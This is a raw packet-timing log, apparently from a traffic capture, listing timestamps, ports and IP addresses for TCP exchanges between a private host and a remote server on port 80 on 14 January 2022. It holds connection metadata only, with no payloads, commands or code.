Jan 14, 2022 13:49:24.271265030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271275043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271285057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271301985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271306992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271326065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271327972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271344900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271348000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271362066 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271369934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271380901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271392107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271405935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271421909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271430969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271444082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271466017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271466970 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271486998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271498919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271509886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271517992 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271529913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271548033 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271552086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271574020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271575928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271595001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271595001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271612883 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271616936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271634102 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271636963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271652937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271658897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271672964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271680117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271697044 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271699905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271713972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271720886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271733999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271743059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271759033 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271764994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271776915 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271786928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271795988 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271807909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271816969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271830082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271851063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271867990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271872044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271893978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271894932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271914959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271923065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271936893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271940947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271959066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271960974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.271980047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.271984100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272000074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272001982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272018909 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272025108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272037983 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272048950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272057056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272077084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272085905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272099018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272120953 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272121906 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272142887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272146940 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272164106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272166014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272185087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272186041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272206068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272207022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272226095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272228003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272245884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272248983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272264004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272269011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272285938 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272290945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272304058 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272313118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272334099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272334099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272356033 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272356033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272376060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272377014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272392988 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272398949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272417068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272428036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272435904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272449970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272470951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272485971 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272495031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272515059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272516012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272536993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272543907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272557974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272562027 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272578955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272583008 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272599936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272604942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272620916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272624969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272641897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272644043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272664070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272664070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272685051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272686958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272706985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272708893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272725105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272728920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272748947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272749901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272764921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272770882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.272789001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.272808075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.536778927 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.689769983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689801931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689820051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689837933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689866066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689882040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689898968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689915895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689929962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.689934015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689946890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689959049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689966917 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.689976931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689994097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.689996004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690011978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690021992 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690030098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690047026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690047979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690066099 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690082073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690090895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690100908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690119028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690129042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690136909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690154076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690171957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690174103 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690188885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690196991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690207005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690212011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690223932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690241098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690251112 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690258980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690274954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690277100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690294027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690301895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690313101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690330029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690345049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690347910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690366030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690382957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690387964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690401077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690413952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690418005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690435886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690454960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690469980 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690470934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690490961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690510035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690517902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690527916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690546036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690562963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690579891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690598011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690607071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690613985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690614939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690633059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690644026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690651894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690669060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690670967 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690685987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690695047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690702915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690720081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690736055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690737009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690754890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690772057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690774918 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690789938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690804958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690807104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690824986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690840006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690845966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690859079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690876007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690885067 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690892935 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690906048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690922976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690923929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690937996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690947056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.690956116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690973997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690992117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.690996885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691004992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691014051 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691023111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691040993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691059113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691062927 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691076994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691082001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691095114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691112041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691113949 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691129923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691139936 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691148043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691164970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691174984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691183090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691200972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691204071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691217899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691227913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691236973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691255093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691263914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691272974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691291094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691298962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691309929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691328049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691333055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691346884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691353083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691365957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691384077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691390038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691401958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691420078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691423893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691437006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691447973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691457033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691473961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691483974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691492081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691510916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691518068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691528082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691544056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691548109 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691561937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691579103 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691582918 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691597939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691616058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691620111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691633940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691644907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691653013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691669941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691678047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691688061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691694975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691705942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691724062 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691734076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691741943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691759109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691764116 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691777945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691787004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691797018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691813946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691823006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691833019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691849947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691859007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691868067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691884995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691901922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691905022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691919088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691936970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691947937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691955090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691966057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691975117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.691987991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.691992998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692009926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692020893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692027092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692044973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692054033 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692063093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692075968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692081928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692099094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692110062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692116976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692135096 CET	80	49743	108.167.165.140	192.168.2.3
